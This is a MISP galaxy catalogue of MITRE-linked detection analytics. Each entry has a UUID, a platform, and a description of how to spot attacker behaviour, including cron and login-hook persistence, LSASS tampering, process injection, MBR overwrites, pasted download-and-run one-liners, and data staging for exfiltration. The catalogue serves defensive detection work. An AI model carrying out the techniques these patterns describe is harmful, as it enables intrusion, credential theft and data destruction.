UUID 0084089f-6e5f-42c4-8b0d-78e95cd55d0f which can be used as unique global reference for Analytic 0295 - AN0295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0295
mitre_platforms ['Identity Provider']

Analytic 0925 - AN0925

ESXi shell or guest VM tools initiate external connections via scripted traffic forwarding to Internet-based proxies. Detected by firewall or shell audit logs showing outbound connection spikes from hypervisor or guest VM to remote proxy nodes.

Internal MISP references

UUID 0c8a9540-51d7-4ba3-8594-8860b3fa8485 which can be used as unique global reference for Analytic 0925 - AN0925 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0925
mitre_platforms ['ESXi']

Analytic 0259 - AN0259

Detects creation or modification of cron jobs via crontab, /etc/cron.* directories, or systemd timer units with execution by unusual users or non-standard intervals.

Internal MISP references

UUID 3374a404-06f9-4b32-bf94-5ac688fb9dad which can be used as unique global reference for Analytic 0259 - AN0259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0259
mitre_platforms ['Linux']

Analytic 0592 - AN0592

Domain logins using network accounts or mobile accounts via Open Directory or Active Directory plugins, especially outside business hours or on atypical endpoints.

Internal MISP references

UUID 96050801-dc36-462f-982e-df2806eaa3ea which can be used as unique global reference for Analytic 0592 - AN0592 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0592
mitre_platforms ['macOS']

Analytic 0529 - AN0529

OAuth token usage for Exchange Online or SharePoint API access without preceding login or from unauthorized clients.

Internal MISP references

UUID 9680d434-3470-4a35-bf48-1785ab14d831 which can be used as unique global reference for Analytic 0529 - AN0529 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0529
mitre_platforms ['Office Suite']

Analytic 0952 - AN0952

Detects unauthorized modification of host binaries, modules, or services within ESXi. Correlates tampered files with subsequent unexpected service behavior or malicious module load attempts.

Internal MISP references

UUID fa36a169-1cca-4887-b362-e3cceb02414f which can be used as unique global reference for Analytic 0952 - AN0952 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0952
mitre_platforms ['ESXi']

Analytic 0266 - AN0266

Use of native tools or scripting (e.g., usermod, passwd, groupmod) to escalate permissions or persist access on existing users, correlated with login or process events.

Internal MISP references

UUID 0eb6cf59-4ba8-4cea-b64a-686ce7c69f70 which can be used as unique global reference for Analytic 0266 - AN0266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0266
mitre_platforms ['Linux']

Analytic 0626 - AN0626

Detects cloud-native software deployment or management (e.g., SSM Run Command, Intune) initiating script execution on endpoints outside expected org IDs, admin groups, or maintenance windows.

Internal MISP references

UUID 2e6218d1-1f84-4dc5-8ab5-c24835aafbab which can be used as unique global reference for Analytic 0626 - AN0626 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0626
mitre_platforms ['SaaS']

Analytic 0662 - AN0662

Adversary modifies website or application-hosted content via unauthorized file changes or script injections, often by exploiting web servers or CMS access.

Internal MISP references

UUID d02dbf1d-b6e9-4c3c-84a2-f70fec797504 which can be used as unique global reference for Analytic 0662 - AN0662 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0662
mitre_platforms ['Windows']

Analytic 0726 - AN0726

Detects staged data aggregated in /Users/Shared, /private/tmp with compression tools like ditto or zip, initiated via Terminal or AppleScript.

Internal MISP references

UUID 01a3cc24-df78-4ff7-8a25-67545d830229 which can be used as unique global reference for Analytic 0726 - AN0726 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0726
mitre_platforms ['macOS']

Analytic 0672 - AN0672

Monitor for file access to certificate directories, commands invoking OpenSSL or PKCS#12 utilities to export or modify certificates, and processes accessing sensitive key storage paths.

Internal MISP references

UUID 27cbe2a7-25a0-4f6d-b2b0-dff50b2c0883 which can be used as unique global reference for Analytic 0672 - AN0672 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0672
mitre_platforms ['Linux']

Analytic 0267 - AN0267

Modifications to user accounts via dscl, pwpolicy, or System Preferences CLI (sysadminctl) that alter user groups, enable root, or bypass MDM restrictions.

Internal MISP references

UUID 616ccbf4-08f2-4b54-8e41-a8e362e31827 which can be used as unique global reference for Analytic 0267 - AN0267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0267
mitre_platforms ['macOS']

Analytic 0627 - AN0627

Detects central router or switch config management tools (e.g., FortiManager, Cisco Prime) triggering device reboots or config pushes using abnormal accounts or IPs.

Internal MISP references

UUID 82acd5d4-70e1-4f3e-b059-15bdc55cf4bf which can be used as unique global reference for Analytic 0627 - AN0627 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0627
mitre_platforms ['Network Devices']

Analytic 0762 - AN0762

VMware management daemons or guest processes initiating encrypted connections outside expected vCenter, update servers, or internal comms. Defender identifies hostd or vpxa initiating outbound TLS flows with uncommon destinations.

Internal MISP references

UUID b94bb114-7532-4934-9955-9c7031109b9e which can be used as unique global reference for Analytic 0762 - AN0762 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0762
mitre_platforms ['ESXi']

Analytic 0276 - AN0276

Unauthorized firmware uploads to routers, switches, or firewalls via TFTP/FTP/SCP. Logs showing boot variable or startup image path changes redirecting to non-standard firmware images. Abnormal reboots or firmware rollback attempts following configuration modification events.

Internal MISP references

UUID ceb2c722-f9ec-41de-980e-d8848b1cb20c which can be used as unique global reference for Analytic 0276 - AN0276 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0276
mitre_platforms ['Network Devices']

Analytic 0268 - AN0268

Modifications to SSO/SAML user attributes (e.g., isAdmin, role, MFA bypass, App assignments) often through CLI, API, or rogue IdP apps.

Internal MISP references

UUID 5c69f3b9-8f73-455e-8eb1-5281cd6ce6d5 which can be used as unique global reference for Analytic 0268 - AN0268 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0268
mitre_platforms ['Identity Provider']

Analytic 0286 - AN0286

Detects network share disconnection attempts using command-line tools like net use /delete, PowerShell Remove-SmbMapping, and correlation with process lineage and SMB session teardown activity.

Internal MISP references

UUID 5d47e6b2-04fb-45ab-be98-7de1baabf508 which can be used as unique global reference for Analytic 0286 - AN0286 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0286
mitre_platforms ['Windows']

Analytic 0682 - AN0682

Detection of persistent login hooks configured via defaults or plist modifications that result in execution of scripts or binaries at user login, breaking expected parent-child process lineage.

Internal MISP references

UUID 7a424183-94ca-4dc1-a03b-610d174aa973 which can be used as unique global reference for Analytic 0682 - AN0682 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0682
mitre_platforms ['macOS']

Analytic 0628 - AN0628

Detects anomalous use of COM objects for execution, such as Office applications spawning scripting engines, enumeration of COM interfaces via registry queries, or processes loading atypical DLLs through COM activation. Correlates process creation, module loads, and registry queries to flag suspicious COM-based code execution or persistence.

Internal MISP references

UUID 8a7a7e80-c28e-42b2-a222-c1d75932c986 which can be used as unique global reference for Analytic 0628 - AN0628 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0628
mitre_platforms ['Windows']

Analytic 0826 - AN0826

Detects unauthorized firmware or configuration changes enabling adversary-in-the-middle positioning (e.g., route injection, DNS spoofing, SSL downgrade). Behavioral analytics focus on sudden changes to routing tables or image file integrity failures.

Internal MISP references

UUID bb3daf14-f237-4688-a319-a4d7570e407e which can be used as unique global reference for Analytic 0826 - AN0826 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0826
mitre_platforms ['Network Devices']

Analytic 0862 - AN0862

Adversary ships a tampered application or update: an updater/installer (msiexec/setup/update.exe/vendor service) writes or replaces binaries; on first run it spawns scripts/shells or unsigned DLLs and beacons to non-approved update CDNs/hosts. Detection correlates: (1) process creation of installer/updater → (2) file metadata changes in program paths → (3) first-run children and module/signature anomalies → (4) outbound connections to unexpected hosts within a short window.

Internal MISP references

UUID e3ddaba3-282b-4bd0-b316-78b724b79acd which can be used as unique global reference for Analytic 0862 - AN0862 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0862
mitre_platforms ['Windows']

Analytic 0296 - AN0296

Offline cracking inferred by subsequent successful CLI or web-based authentications into routers or switches from previously dumped accounts

Internal MISP references

UUID 029db14d-fb94-49ee-9d6d-3c7212671377 which can be used as unique global reference for Analytic 0296 - AN0296 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0296
mitre_platforms ['Network Devices']

Analytic 0629 - AN0629

Unauthorized creation or modification of DLLs loaded by LSASS, abnormal registry values under LSA extensions, and anomalous DLL load activity into the lsass.exe process context—correlated during boot or logon events.

Internal MISP references

UUID 5028303d-22d6-490c-b053-015e877d5829 which can be used as unique global reference for Analytic 0629 - AN0629 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0629
mitre_platforms ['Windows']

Analytic 0269 - AN0269

Addition of new users or changes to role permissions (e.g., ReadOnly -> Admin) via API or vSphere Client, particularly from non-jumpbox IPs.

Internal MISP references

UUID 74565d24-df58-49b6-86e0-01a03d6dc2a7 which can be used as unique global reference for Analytic 0269 - AN0269 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0269
mitre_platforms ['ESXi']

Analytic 0692 - AN0692

IAAS (Cloud images/VMs): A new VM/instance is launched from a non-approved or newly-seen image (AMI/GCP Image/Azure Image). On first boot, cloud-init/user-data or embedded agents download code, spawn system utilities, or open outbound C2/mining traffic. The analytic correlates Instance/Image Creation → Instance Start → in-guest Process/Command Execution and/or anomalous network traffic.

Internal MISP references

UUID 7b711402-12f7-4985-93df-2693eaf9ebdb which can be used as unique global reference for Analytic 0692 - AN0692 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0692
mitre_platforms ['Windows']

Analytic 0962 - AN0962

A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.

Internal MISP references

UUID 8cb0a7da-942b-4771-b9d5-cf558755677a which can be used as unique global reference for Analytic 0962 - AN0962 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0962
mitre_platforms ['Windows']

Analytic 0926 - AN0926

Changes to NAT/firewall policies enabling outbound port forwarding from internal IPs to Internet-based proxy endpoints. Log spikes in outbound flows to CDN, VPS, or anomalous ASNs with few return packets.

Internal MISP references

UUID bca44b88-4615-45b8-8fb9-ce934c65c8be which can be used as unique global reference for Analytic 0926 - AN0926 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0926
mitre_platforms ['Network Devices']

Analytic 0727 - AN0727

Detects local staging behavior via snapshot creation or files written into VMFS partitions by scripts or unauthorized shell access.

Internal MISP references

UUID 27caeb90-1cf0-4650-a3f3-c8a1edaecbab which can be used as unique global reference for Analytic 0727 - AN0727 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0727
mitre_platforms ['ESXi']

Analytic 0772 - AN0772

Behavioral chain of a user being granted elevated privileges or roles in Entra ID or Okta following suspicious login or account creation activity.

Internal MISP references

UUID a52321d0-5961-497b-8212-61602e05420b which can be used as unique global reference for Analytic 0772 - AN0772 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0772
mitre_platforms ['Identity Provider']

Analytic 0277 - AN0277

Detects malicious injection behavior involving memory allocation, remote thread queuing via APC (e.g., QueueUserAPC), and altered thread context within another live process to execute unauthorized code under legitimate context.

Internal MISP references

UUID f0fce510-b195-4688-a4ac-b78584febd08 which can be used as unique global reference for Analytic 0277 - AN0277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0277
mitre_platforms ['Windows']

Analytic 0872 - AN0872

Detection of browser-based or email client-driven file creation (often from temp directories) following navigation to or execution of HTML files containing JavaScript Blob APIs or base64 Data URLs, with follow-on execution of the dropped payload. Leveraging Sysmon EventID 15 to inspect Zone.Identifier ADS for HostUrl/ReferrerUrl indicators (e.g., HostUrl=about:internet). Optional: absence of a large HTTP download record for the same URL/client in proxy logs (suggests local assembly)

Internal MISP references

UUID 0cb02d2e-dcea-4195-80e7-81ec29b4d546 which can be used as unique global reference for Analytic 0872 - AN0872 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0872
mitre_platforms ['Windows']

Analytic 0782 - AN0782

Monitors for compression tool usage (e.g., 7zip, WinRAR, MakeCab) that follows or precedes file modification, suspicious file types (e.g., .exe, .dll) being compressed, or dropped from self-extracting archives followed by immediate execution.

Internal MISP references

UUID 18253101-bce9-453e-ab03-603bbd174552 which can be used as unique global reference for Analytic 0782 - AN0782 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0782
mitre_platforms ['Windows']

Analytic 0827 - AN0827

Processes attempting raw disk access to overwrite sensitive structures such as the MBR or partition table using \.\PhysicalDrive notation. Detection relies on correlating process creation, privilege escalation, and raw sector writes in Sysmon and Security logs.

Internal MISP references

UUID 34560ac3-2e05-4394-8145-0cd6071c1680 which can be used as unique global reference for Analytic 0827 - AN0827 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0827
mitre_platforms ['Windows']

Analytic 0287 - AN0287

Detects modification of LSASS and authentication DLLs, suspicious registry changes to password filter packages, and abnormal process access to lsass.exe. Correlates registry modifications, DLL loads, and process handle access events.

Internal MISP references

UUID 818b46ce-9c93-47c9-a649-8bc5d3b734a5 which can be used as unique global reference for Analytic 0287 - AN0287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0287
mitre_platforms ['Windows']

Analytic 0278 - AN0278

Detects execution of Lua interpreters or scripts (.lua), especially when correlated with suspicious parent processes or file drop events, indicating malicious use of embedded scripting.

Internal MISP references

UUID b3ea7945-a7ef-421c-be84-af86b2b95ae5 which can be used as unique global reference for Analytic 0278 - AN0278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0278
mitre_platforms ['Windows']

Analytic 0728 - AN0728

Monitor DNS query results where subsequent connections use derived or unusual port numbers not explicitly resolved, especially when tied to suspicious processes. Correlate Sysmon DNS logs (Event ID 22) with process creation and socket activity.

Internal MISP references

UUID f47f256d-686f-4553-85e2-bd4d156da1e7 which can be used as unique global reference for Analytic 0728 - AN0728 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0728
mitre_platforms ['Windows']

Analytic 0972 - AN0972

VM or cloud instance generating anomalously high network egress targeting same destination IP or service, especially using stateless protocols.

Internal MISP references

UUID 408b2724-079c-4636-9764-52f435726de7 which can be used as unique global reference for Analytic 0972 - AN0972 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0972
mitre_platforms ['IaaS']

Analytic 0729 - AN0729

Inspect resolver and audit logs for processes initiating outbound connections to ports calculated from DNS response IPs. Abnormal ephemeral port usage shortly after DNS queries can indicate DNS calculation behavior.

Internal MISP references

UUID 98f5c157-17c8-4ab8-943d-8d4c54dc3d6d which can be used as unique global reference for Analytic 0729 - AN0729 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0729
mitre_platforms ['Linux']

Analytic 0927 - AN0927

A process/script constructs or references a custom/alphabet translation table (e.g., 64/85/32+ arbitrary chars, XOR/base-N loops) or emits long high-entropy strings that do NOT validate as standard Base64/Hex → shortly after, the same process (or its child) generates outbound traffic with asymmetric bytes_out:bytes_in, fixed-size beacons, or protocol/header mismatches (e.g., Content-Type says JSON but body fails JSON parse / contains non-standard alphabet).

Internal MISP references

UUID b8dea721-8e0d-4bcd-bde4-6609afd595e5 which can be used as unique global reference for Analytic 0927 - AN0927 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0927
mitre_platforms ['Windows']

Analytic 0297 - AN0297

Detects PE injection through a behavioral sequence where one process opens (OpenProcess) a handle to another, allocates remote memory (VirtualAllocEx), writes a PE header (MZ) or shellcode (WriteProcessMemory), then initiates a new thread (CreateRemoteThread or NtCreateThreadEx) in that process—executing injected code in memory without touching disk. Optional: injects a trampoline or shellcode that unpacks/reflectively maps the payload.

Internal MISP references

UUID d845dc30-6950-4f0c-9342-29b7a7315bd2 which can be used as unique global reference for Analytic 0297 - AN0297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0297
mitre_platforms ['Windows']

Analytic 0792 - AN0792

Monitor for anomalous email activity originating from Windows-hosted applications (e.g., Outlook) where the sending account name or display name does not match the underlying SMTP address. Detect abnormal volume of outbound messages containing sensitive keywords (e.g., 'payment', 'wire transfer') or anomalous login locations for accounts associated with email sending activity.

Internal MISP references

UUID e4246c20-fbe4-4750-a29e-44e3fe179bf2 which can be used as unique global reference for Analytic 0792 - AN0792 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0792
mitre_platforms ['Windows']

Analytic 0279 - AN0279

Detects invocation of lua or luajit interpreters by users or services outside of expected packages, chained with script drop or memory artifacts.

Internal MISP references

UUID f8e77c9a-2b8c-47d2-b44a-23857d246016 which can be used as unique global reference for Analytic 0279 - AN0279 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0279
mitre_platforms ['Linux']

Analytic 0828 - AN0828

Execution of utilities (dd, hdparm, sgdisk) or custom binaries attempting to overwrite disk boot structures (/dev/sda MBR sector or partition tables). Detection correlates shell execution with syscalls writing to sector 0 or disk metadata blocks.

Internal MISP references

UUID 538707d4-df45-489b-97f5-0115802a701f which can be used as unique global reference for Analytic 0828 - AN0828 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0828
mitre_platforms ['Linux']

Analytic 0288 - AN0288

Detects modification of PAM configuration files, unauthorized new PAM modules, and suspicious process execution accessing PAM-related binaries. Correlates file modification events in /etc/pam.d/ with process execution of unauthorized binaries.

Internal MISP references

UUID 776b9173-cbe0-4d1e-8ac9-af19b3db9dd7 which can be used as unique global reference for Analytic 0288 - AN0288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0288
mitre_platforms ['Linux']

Analytic 0882 - AN0882

Processes attempting raw disk access via \.\PhysicalDrive paths, abnormal file I/O to MBR/boot sectors, or loading of third-party drivers (e.g., RawDisk) that enable disk overwrite. Correlate process creation, privilege usage, and disk modification events within a short time window.

Internal MISP references

UUID d1ad1b0b-0050-4737-8993-73c2da8d143b which can be used as unique global reference for Analytic 0882 - AN0882 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0882
mitre_platforms ['Windows']

Analytic 0928 - AN0928

Shell scripts or binaries implement custom mapping tables (tr/sed/awk/golang/rust/python encode loops), or emit long high-entropy tokens that fail Base64/Hex validation → correlated with egress showing asymmetric flow, protocol-mismatch payloads, or DNS/HTTP bodies containing low-diversity-but-long custom alphabets.

Internal MISP references

UUID 09125bb1-29eb-4d40-994a-2e1aa7bcd105 which can be used as unique global reference for Analytic 0928 - AN0928 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0928
mitre_platforms ['Linux']

Analytic 0892 - AN0892

Changes to security configurations such as disabling MFA requirements, reducing session token lifetimes, or turning off risk-based policies. Correlate admin logins with sudden policy downgrades.

Internal MISP references

UUID 0ba25127-85e4-46ef-8173-96aa9df90c22 which can be used as unique global reference for Analytic 0892 - AN0892 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0892
mitre_platforms ['Identity Provider']

Analytic 0982 - AN0982

Use of tools like xwd or import to generate screenshots, especially under non-GUI parent processes.

Internal MISP references

UUID 121a5310-3157-47b1-925e-998767c0ec06 which can be used as unique global reference for Analytic 0982 - AN0982 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0982
mitre_platforms ['Linux']

Analytic 0829 - AN0829

Abnormal invocation of diskutil or asr that modifies partition tables or initializes raw devices. Monitor for IOKit system calls targeting disk headers or EFI boot sectors, correlated with elevated privileges.

Internal MISP references

UUID 575a9c01-6dac-4513-86ca-e80b6e485212 which can be used as unique global reference for Analytic 0829 - AN0829 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0829
mitre_platforms ['macOS']

Analytic 0298 - AN0298

Correlation of inbound emails with embedded links followed by user-driven browser navigation to suspicious or obfuscated domains. Detection chain includes malicious URL in email → user click recorded in Office logs → browser process spawning unusual child processes (e.g., PowerShell, cmd) or download activity.

Internal MISP references

UUID a39fccda-e5ea-49de-80f9-d67ae3b8c799 which can be used as unique global reference for Analytic 0298 - AN0298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0298
mitre_platforms ['Windows']

Analytic 0289 - AN0289

Detects unauthorized additions or changes to /Library/Security/SecurityAgentPlugins and suspicious process activity attempting to hook authentication APIs. Correlates file modifications with abnormal plugin loads in authentication flows.

Internal MISP references

UUID ee0f60f3-2fb3-4857-b02e-58c69b5aab52 which can be used as unique global reference for Analytic 0289 - AN0289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0289
mitre_platforms ['macOS']

Analytic 0992 - AN0992

Detect suspicious file creations and process executions triggered by browser activity (e.g., injected payloads written to %AppData% or Temp directories, then executed). Correlate network anomalies with subsequent local process creation or script execution.

Internal MISP references

UUID 8384d942-2f83-4968-9959-fd2f55afb311 which can be used as unique global reference for Analytic 0992 - AN0992 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0992
mitre_platforms ['Windows']

Analytic 0929 - AN0929

EndpointSecurity/Unified Logs show processes generating custom alphabets or long high-entropy, non-standard tokens → network logs (PF/Zeek/EDR) show asymmetric beacons, protocol mismatches, or periodic fixed-size posts.

Internal MISP references

UUID bdc546bb-9d92-489e-8aa8-8de1bd08f320 which can be used as unique global reference for Analytic 0929 - AN0929 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0929
mitre_platforms ['macOS']

Analytic 0299 - AN0299

Detection of spearphishing links through mail logs and browser activity. Behavior includes email with suspicious URLs → user click recorded in mail/web proxy logs → shell or interpreter launched from browser process.

Internal MISP references

UUID e08e4dd6-cab5-41c0-b136-1bc8426c25ed which can be used as unique global reference for Analytic 0299 - AN0299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0299
mitre_platforms ['Linux']

Analytic 0333 - AN0333

Detects manipulation of PNG, JPG, or GIF files by user-initiated scripts followed by script execution or exfiltration behavior, especially from osascript, python, or bash, in combination with LaunchAgent persistence or curl activity.

Internal MISP references

UUID eb5334b4-8a19-4efd-a225-44a2783c6d39 which can be used as unique global reference for Analytic 0333 - AN0333 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0333
mitre_platforms ['macOS']

Analytic 0433 - AN0433

Interactive or remote shell/API invocation of esxcli system clock get or querying time parameters via hostd/vpxa shortly followed by time/ntp configuration checks or scheduled task creation, executed by non-standard accounts or outside maintenance windows.

Internal MISP references

UUID 2e51d33e-28d3-4e3f-a68a-38bc2d4abdde which can be used as unique global reference for Analytic 0433 - AN0433 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0433
mitre_platforms ['ESXi']

Analytic 0343 - AN0343

Detects mounted external devices (via /media or /mnt) followed by large file read or copy operations by shell scripts, unauthorized users, or staging tools (e.g., tar, rsync).

Internal MISP references

UUID 4e288214-93b3-48a7-b51e-2b0136db8540 which can be used as unique global reference for Analytic 0343 - AN0343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0343
mitre_platforms ['Linux']

Analytic 0334 - AN0334

Correlated user account modification (reset, disable, deletion) events with anomalous process lineage (e.g., PowerShell or net.exe from an interactive session), especially outside of IT admin change windows or by non-admin users.

Internal MISP references

UUID 7d0595b9-eca7-488d-bbc2-ed02ff4ced9b which can be used as unique global reference for Analytic 0334 - AN0334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0334
mitre_platforms ['Windows']

Analytic 0335 - AN0335

Password changes or account deletions via 'passwd', 'userdel', or 'chage' preceded by interactive shell or remote command execution from non-privileged accounts.

Internal MISP references

UUID a941dd04-5626-4091-9eed-300d7d7f0a1f which can be used as unique global reference for Analytic 0335 - AN0335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0335
mitre_platforms ['Linux']

Analytic 0353 - AN0353

Direct modification of /etc/ssh/keys-/authorized_keys or enabling SSH in sshd_config to support public key auth.

Internal MISP references

UUID e5b0d0ab-a464-4e9f-a1c0-dfb08a6ef53f which can be used as unique global reference for Analytic 0353 - AN0353 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0353
mitre_platforms ['ESXi']

Analytic 0533 - AN0533

Use of pbpaste, AppleScript, or third-party automation frameworks (e.g., Automator) to collect clipboard or file content in bursts. Observable via unified logs.

Internal MISP references

UUID f6ad51e5-b869-455d-acb1-ef725acb27cb which can be used as unique global reference for Analytic 0533 - AN0533 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0533
mitre_platforms ['macOS']

Analytic 0363 - AN0363

Adversary enumeration of domain accounts using net.exe, PowerShell, WMI, or LDAP queries from non-domain controllers or non-admin endpoints.

Internal MISP references

UUID 8f0ac116-4c8a-4819-b7c0-744e05d672c9 which can be used as unique global reference for Analytic 0363 - AN0363 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0363
mitre_platforms ['Windows']

Analytic 0633 - AN0633

Processes initiating outbound connections on uncommon ports or using protocols inconsistent with the assigned port. Correlating process creation with subsequent network connections reveals anomalies such as svchost.exe or Office applications using high, atypical ports.

Internal MISP references

UUID 9ea7f21e-700f-4900-a1d4-dfc171d399fe which can be used as unique global reference for Analytic 0633 - AN0633 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0633
mitre_platforms ['Windows']

Analytic 0336 - AN0336

Execution of dscl or sysadminctl commands to disable, delete, or modify users combined with anomalous process ancestry or terminal session launch.

Internal MISP references

UUID adbe8ef2-15e5-4fb9-83d8-4c67b7b1be78 which can be used as unique global reference for Analytic 0336 - AN0336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0336
mitre_platforms ['macOS']

Analytic 0337 - AN0337

Invocation of esxcli 'system account remove' from vCLI, SSH, or vSphere API with anomalous user access or outside maintenance windows.

Internal MISP references

UUID 2c5d3103-2b9c-4b56-b415-c01e055fff64 which can be used as unique global reference for Analytic 0337 - AN0337 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0337
mitre_platforms ['ESXi']

Analytic 0733 - AN0733

Detects JavaScript execution through WSH (wscript.exe, cscript.exe) or HTA (mshta.exe), particularly when spawned from Office macros, web browsers, or abnormal user paths. Correlates script execution with outbound network activity or system modification.

Internal MISP references

UUID 3f257014-01d4-487d-980c-77d4d2130315 which can be used as unique global reference for Analytic 0733 - AN0733 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0733
mitre_platforms ['Windows']

Analytic 0373 - AN0373

File lock acquired via open() + flock() or lockf() on predictable path (e.g., /tmp/.lock123) followed by conditional early exit or divergent process behavior.

Internal MISP references

UUID 7c0e4ffa-7f95-41de-9e3b-de2ad4a7a9ae which can be used as unique global reference for Analytic 0373 - AN0373 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0373
mitre_platforms ['Linux']

Analytic 0833 - AN0833

Detects invocation of macOS-native archiving utilities (zip, ditto, hdiutil) or openssl used for encryption. Correlates execution with archive or encrypted file creation (.zip, .dmg, .tar.gz) in user or temporary directories. Identifies anomalous use of archiving commands by Office applications or daemons.

Internal MISP references

UUID 18cf5cf7-f46b-4258-a0aa-503881c9c88e which can be used as unique global reference for Analytic 0833 - AN0833 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0833
mitre_platforms ['macOS']

Analytic 0338 - AN0338

O365 UnifiedAuditLog entries for Remove-Mailbox or Set-Mailbox with account disable or delete actions correlated with suspicious login locations or MFA bypass.

Internal MISP references

UUID ba6c8c55-ee38-4219-a426-a3f1e04c7a8a which can be used as unique global reference for Analytic 0338 - AN0338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0338
mitre_platforms ['Office Suite']

Analytic 0383 - AN0383

Detection of unauthorized modification of Active Directory SID-History attributes to escalate privileges. This chain involves: (1) privileged operations or API calls to DsAddSidHistory or related AD modification functions, (2) observed attribute changes in SID-History (Event ID 5136), (3) new logon sessions where the token includes unexpected or privileged SID-History values, and (4) follow-on resource access using elevated privileges derived from SID-History injection.

Internal MISP references

UUID c061d938-cafa-4e9d-8729-29d63ba633ad which can be used as unique global reference for Analytic 0383 - AN0383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0383
mitre_platforms ['Windows']

